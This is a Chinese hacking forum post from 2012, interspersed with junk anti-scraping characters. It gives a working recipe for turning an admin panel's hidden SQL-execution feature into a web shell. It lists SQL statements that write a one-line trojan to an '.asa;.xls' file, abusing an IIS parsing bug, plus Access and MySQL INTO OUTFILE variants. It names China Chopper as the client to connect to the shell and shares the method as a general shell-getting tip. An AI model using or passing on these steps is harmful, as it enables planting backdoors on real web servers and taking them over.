好不容易进了后台,发现啥上传啊。备份啊多木有。
6 @, B+ H" C9 m$ }$ _webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
' D0 `: ]( @) m" ^文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
; Q, V; G( s4 y8 S2 |. z' x0 K! a然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
" ~' M# [( k* o( E1.create table cmd (a varchar(50))
& E- w4 \* l/ \2.insert into cmd (a) values (‘‘)5 ?$ h+ T2 `5 ]! [
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
. X& A- ^7 v; l, \(把表cmd的内容导出为物理路径的一个EXCEL文件)/ \5 `( s9 M' y8 ?
4.drop table cmd
& S6 s! I0 y( O3 a: h利用IIS的BUG成功拿到了WEBSHELL。3 ~ i. w/ i* n
# i: @" a7 X, B B5 i- U$ D直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话7 r- l. T9 p9 E3 V/ N* F: [
N" v: G- P& ` ?5 J7 J4 r) C
SQL语句意思解释:6 C; d( w" E! z1 }( o" V2 z1 C* v
第一句
7 |! N3 N3 ^+ ~/ q8 G 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
# Z+ `; U% J$ s6 a
) i( N# ~8 y) a: D, E0 s0 T 第二句* w4 H" L! }% n( k/ ^, P( ?
在表cmd的a字段插入一句话木马
, e( x0 @" y) x# L 第三句
5 e& d9 [5 y6 ^ X 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
+ s8 q; G6 C7 [/ M) |3 |7 i# @7 X J, ]- F4 x& j/ F/ T
第四句
- r0 Z/ B" x+ K* `. g6 r G, u 删除建立的cmd表# o, D9 }) k0 B5 {8 Q5 w
- [6 P7 p$ Y; W7 ^$ a! h8 y 以下内容为测试:
9 I" O, J" b9 c( [3 n3 S9 P# B Access利用后台SQL执行命令功能导出WebShell:
8 R3 p& Q8 U" x4 {# n4 a" e 这个更简单:) j. P6 ?' ?& x9 `4 ~) Q6 D+ m, E
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
3 X7 D( [; J8 c4 X% Q/ j4 N 或者) t9 i/ n3 {* @7 \0 K
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]; |! r5 t- N5 E+ s# T: i) A
l+ W# H! p$ W$ M4 ?0 _0 a& J 后台有执行SQL语句功能(vote为已知表段)
, w4 e S* j/ V, d t' R 希望对大家有所帮助拿shell的又一个思路. O8 c+ Y" i: T! e9 Z. a
|
发表于 2012-9-13 17:53:58
收藏
支持
反对